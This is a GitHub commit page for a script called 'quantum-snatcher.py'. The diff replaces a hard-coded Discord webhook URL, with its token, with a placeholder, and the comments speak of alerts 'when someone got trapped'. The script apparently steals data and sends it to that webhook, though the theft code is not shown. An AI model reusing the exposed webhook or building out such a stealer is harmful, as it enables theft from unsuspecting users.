Skip to content

Commit

Permalink
Update quantum-snatcher.py
Browse files Browse the repository at this point in the history
  • Loading branch information
wockmontana authored Feb 24, 2022
1 parent 7553bea commit 12d7007
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion quantum-snatcher.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@
from urllib.request import Request, urlopen

#_#ENTER YOUR WEBHOOK ADRESS HERE#_# seraphinetruth
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/946496279268184064/yiBlJloLJBy2FlyO6pDQ4a-sdoE6XGV6IMoN5ZsVSvFBCOdUXbaFSNPKsp4xgyIDHENs'
WEBHOOK_URL = 'WEBHOOK_URL_HERE'

#_#ENABLE IF YOU WANT MENTION WHEN SOMEONE GOT TRAPPED:D#_# seraphinetruth
PING_ME = False
Expand Down

0 comments on commit 12d7007

Please # to comment.